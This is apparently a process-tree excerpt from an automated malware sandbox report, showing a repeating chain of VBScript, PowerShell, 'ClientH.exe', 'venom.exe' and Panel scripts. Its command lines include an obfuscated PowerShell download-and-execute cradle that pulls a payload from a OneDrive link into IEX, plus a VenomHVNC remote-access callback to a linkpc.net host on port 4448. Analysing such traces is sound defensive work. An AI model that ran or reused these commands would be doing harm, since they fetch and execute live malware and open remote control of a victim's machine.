        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        39⤵
        
        PID:9584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        38⤵
        
        PID:9392
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        39⤵
        
        PID:9536
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        39⤵
        
        PID:9568
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        38⤵
        
        PID:9624
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        38⤵
        
        PID:9952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        39⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        37⤵
        
        PID:8636
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        38⤵
        
        PID:5176
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        38⤵
        
        PID:6028
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        38⤵
        
        PID:5236
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        37⤵
        
        PID:3504
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        37⤵
        
        PID:8664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9516
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        36⤵
        
        PID:3764
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        37⤵
        
        PID:2648
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        37⤵
        
        PID:9032
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        36⤵
        
        PID:8444
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        36⤵
        
        PID:9152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        35⤵
        
        PID:8848
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        36⤵
        
        PID:8308
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        36⤵
        
        PID:9016
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        35⤵
        
        PID:8956
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        35⤵
        
        PID:3536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5672
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        34⤵
        
        PID:5536
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        35⤵
        
        PID:8752
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        35⤵
        
        PID:8680
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        34⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        34⤵
        
        PID:4780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        35⤵
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        33⤵
        
        PID:8916
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        34⤵
        
        PID:4492
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        34⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        33⤵
        
        PID:8216
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        33⤵
        
        PID:4656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7180
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        35⤵
        
        PID:10980
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        32⤵
        
        PID:8684
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        33⤵
        
        PID:8756
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        33⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        32⤵
        
        PID:9036
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        32⤵
        
        PID:7000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6868
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        34⤵
        
        PID:10444
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        31⤵
        
        PID:8728
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        32⤵
        
        PID:8948
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        32⤵
        
        PID:8956
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        31⤵
        
        PID:8740
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        31⤵
        
        PID:8848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4720
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        33⤵
        
        PID:8432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        34⤵
        
        PID:11096
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        30⤵
        
        PID:1248
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        31⤵
        
        PID:8288
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        31⤵
        
        PID:8296
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        31⤵
        
        PID:8380
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        31⤵
        
        PID:8432
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        31⤵
        
        PID:8484
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        30⤵
        
        PID:8344
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        30⤵
        
        PID:8600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1248
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        32⤵
        
        PID:8888
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        33⤵
        
        PID:10380
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        29⤵
        
        PID:1276
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        30⤵
        
        PID:3616
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        30⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        29⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        29⤵
        
        PID:3888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8252
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        31⤵
        
        PID:9964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        32⤵
        
        PID:7204
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        28⤵
        
        PID:7628
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        29⤵
        
        PID:6852
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        29⤵
        
        PID:544
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        29⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        28⤵
        
        PID:7800
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        28⤵
        
        PID:4544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        29⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        30⤵
        
        PID:10124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        31⤵
        
        PID:9880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9704
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        27⤵
        
        PID:6852
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        28⤵
        
        PID:6444
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        28⤵
        
        PID:1876
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        28⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        27⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        27⤵
        
        PID:7332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7592
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        29⤵
        
        PID:9792
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        30⤵
        
        PID:9696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10740
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        26⤵
        
        PID:2332
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        27⤵
        
        PID:7496
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        27⤵
        
        PID:7944
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        26⤵
        
        PID:8120
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        26⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4832
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        28⤵
        
        PID:9496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        29⤵
        
        PID:8184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        25⤵
        
        PID:3268
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        26⤵
        
        PID:7448
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        26⤵
        
        PID:7724
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        26⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        25⤵
        
        PID:7456
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        25⤵
        
        PID:7840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5528
        
